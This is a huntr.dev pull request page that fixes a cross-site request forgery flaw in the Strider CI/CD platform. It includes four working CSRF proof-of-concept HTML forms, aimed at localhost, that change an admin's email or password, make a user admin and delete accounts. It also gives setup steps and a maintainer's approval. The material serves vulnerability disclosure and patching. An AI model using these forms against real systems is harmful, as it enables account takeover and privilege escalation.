Security Fix for Cross-site Request Forgery (CSRF) - huntr.dev

[huntr-helper]

https://huntr.dev/users/arjunshibu has fixed the Cross-site Request Forgery (CSRF) vulnerability 🔨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | 418sec#1
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/other/strider/1/README.md

User Comments:

📊 Metadata *

Bounty URL: https://www.huntr.dev/bounties/1-other-strider

⚙️ Description *

Strider is an Open Source Continuous Deployment / Continuous Integration platform. It is written in Node.js and Ember.js and uses MongoDB as a backing store. This platform is vulnerable to Cross-Site Request Forgery (CSRF). It allowes an attacker to takeover accounts, privillege escalation and accounts deletion.

💻 Technical Description *

CSRF Protection is implemented using csurf middleware.

🐛 Proof of Concept (PoC) *

1. Setup MongoDB
2. Install the package

git clone https://github.com/Strider-CD/strider.git
cd strider/apps/strider
npm i
node bin/strider addUser # add users accordingly
NODE_ENV=production npm start # start server

3. Login as admin
4. Use any of the CSRF POCs

Change email

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:3000/api/account/email" method="POST">
      <input type="hidden" name="email" value="admin2&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Change password

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:3000/api/account/password" method="POST">
      <input type="hidden" name="password" value="hacked" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Privilege escalation

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:3000/admin/make_admin">
      <input type="hidden" name="user" value="user&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Account deletion

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:3000/admin/remove_user" method="POST">
      <input type="hidden" name="email" value="admin&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

🔥 Proof of Fix (PoF) *

1. Build app

cd strider/apps/strider
npm i
npm run build

2. Build client

cd strider/clients/classic-ui
npm i
npm run build

3. Start server

Before fix:

After fix:

👍 User Acceptance Testing (UAT)

• I've executed unit tests.
• After fix the functionality is unaffected.

[vercel]

This pull request is being automatically deployed with Vercel (learn more).
To see the status of your deployment, click below or on the icon next to each commit.

🔍 Inspect: https://vercel.com/knownasilya1/strider/3121f5wf5
✅ Preview: https://strider-git-fork-418sec-1-other-strider.knownasilya1.vercel.app

[knownasilya]

Thanks for this, looks good!